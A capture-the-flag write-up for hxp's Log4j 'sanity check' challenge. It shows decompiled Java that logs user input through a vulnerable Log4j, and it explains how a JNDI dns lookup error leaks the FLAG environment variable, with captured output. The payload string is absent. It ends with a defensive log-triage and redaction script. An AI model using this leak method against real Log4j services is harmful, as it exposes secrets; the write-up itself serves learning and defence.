Summary: Exploit a Log4j vulnerability to leak environment variables.

Challenge Prompt

Log 4 sanity check
by 0xbb
misc baby
Difficulty estimate: easy - easy

Points: round(1000 · min(1, 10 / (9 + [87 solves]))) = 104 points


Log 4 sanity check-9afb8a24feb86db1.tar.xz (1.7 MiB)

Connection (mirrors):
nc 1337

Attachment: challenge file


This is a sanity check challenge and so is very easy. A Vuln.class is provided in the tar file. This is decompiled with Procyon:

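import java.util.Scanner;
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

// Decompiled by Procyon v0.5.36

public class Vuln {
    public static void main(final String[] array) {
        try {
            final Logger logger = LogManager.getLogger((Class)Vuln.class);
            System.out.println("What is your favourite CTF?");
            // The Scanner call is truncated on this page; reading one token
            // from stdin is an assumption (the service is reached over nc).
            final String next = new Scanner(System.in).next();
            if (next.toLowerCase().contains("dragon")) {
                // branch body not preserved on this page
            }
            if (next.toLowerCase().contains("hxp")) {
                // branch body not preserved on this page
            }
            else {
                // User-controlled input is handed to Log4j, which expands
                // ${...} lookups inside it (CVE-2021-44228).
                logger.error("Wrong answer: {}", (Object)next);
            }
        }
        catch (Exception x) {
            // handler body not preserved on this page
        }
    }
}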

This is trivially vulnerable to CVE-2021-44228 (not going to call it Log4Shell, that is a stupid name).

It can be seen from the Dockerfile that the FLAG environment variable contains the flag.

CMD ynetd -np y -lm -1 -lpid 64 -lt 10 -t 30 "FLAG='$(cat /flag.txt)' /home/ctf/"

We can leak this with the following string:


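Using this payload leaks the flag in the error messages: once the flag is substituted in, the DNS name contains a label longer than 63 octets, so the JNDI DNS provider throws an InvalidNameException whose message echoes the name.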

nc 1337
What is your favourite CTF?
2021-12-19 21:15:06,116 main WARN Error looking up JNDI resource [dns://{Phew, I am glad I code everything in PHP anyhow :) - :( :( :(}]. javax.naming.InvalidNameException: Label exceeds 63 octets: leak=hxp{Phew, I am glad I code everything in PHP anyhow :) - :( :( :(}; remaining name 'leak=hxp{Phew, I am glad I code everything in PHP anyhow :) - :( :( :(}'
	at jdk.naming.dns/com.sun.jndi.dns.DnsName.verifyLabel(
	at jdk.naming.dns/com.sun.jndi.dns.DnsName.add(
	at jdk.naming.dns/com.sun.jndi.dns.DnsName.parse(
	at jdk.naming.dns/com.sun.jndi.dns.DnsName.<init>(
	at jdk.naming.dns/com.sun.jndi.dns.DnsContext.fullyQualify(
	at jdk.naming.dns/com.sun.jndi.dns.DnsContext.c_lookup(
	at java.naming/com.sun.jndi.toolkit.ctx.ComponentContext.p_lookup(

Flag: hxp{Phew, I am glad I code everything in PHP anyhow :) - :( :( :(}
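
From the defender's side, the WARN line above is the artifact to look for: it shows which lookup scheme was attempted and echoes whatever value was substituted into the name. The following is an added example (not part of the challenge or the original writeup) that triages such lines, reports which known secrets they expose and redacts them; `triage`, `scan`, `MIN_SECRET_LEN` and the sample data are constructed for illustration.

```python
import re

# Log4j status-logger WARN for a failed JNDI lookup (format as in the output above).
JNDI_WARN = re.compile(
    r"WARN Error looking up JNDI resource \[(?P<resource>.*?)\]\. "
    r"(?P<exc>[\w.$]+): (?P<msg>.*)$"
)
# InvalidNameException text that echoes the already-substituted DNS label.
LONG_LABEL = re.compile(r"Label exceeds 63 octets: (?P<label>.*?); remaining name")
MIN_SECRET_LEN = 8  # assumption: shorter values match too much unrelated text


def triage(line, secrets):
    """Return a finding for a JNDI lookup failure, or None for any other line.
    `secrets` maps a name to its value, e.g. the service's environment.
    """
    m = JNDI_WARN.search(line)
    if m is None:
        return None
    label = LONG_LABEL.search(m["msg"])
    exposed = sorted(n for n, v in secrets.items()
                     if len(v) >= MIN_SECRET_LEN and v in line)
    redacted = line
    for name in exposed:
        redacted = redacted.replace(secrets[name], f"<redacted:{name}>")
    return {"scheme": m["resource"].split(":", 1)[0].lower(),
            "exception": m["exc"],
            "echoed_label": label["label"] if label else "",
            "exposed": exposed, "redacted": redacted}


def scan(lines, secrets):
    return [f for f in (triage(l, secrets) for l in lines) if f]


# Constructed sample data (not the challenge's): a 70-character stand-in secret.
SECRET = "constructed-secret-" + "A" * 51
ENV = {"FLAG": SECRET, "HOME": "/home/ctf", "LANG": "C"}
SAMPLE_LOG = [
    "What is your favourite CTF?",
    "2021-12-19 21:15:06,116 main WARN Error looking up JNDI resource "
    f"[dns://leak={SECRET}]. javax.naming.InvalidNameException: "
    f"Label exceeds 63 octets: leak={SECRET}; remaining name 'leak={SECRET}'",
    "\tat jdk.naming.dns/com.sun.jndi.dns.DnsName.verifyLabel(",
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG, ENV):
        print(finding["exception"], finding["exposed"], finding["redacted"])
```

Any secret reported in `exposed` has been written to the log in clear text and should be rotated, whether or not a DNS query ever left the host.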
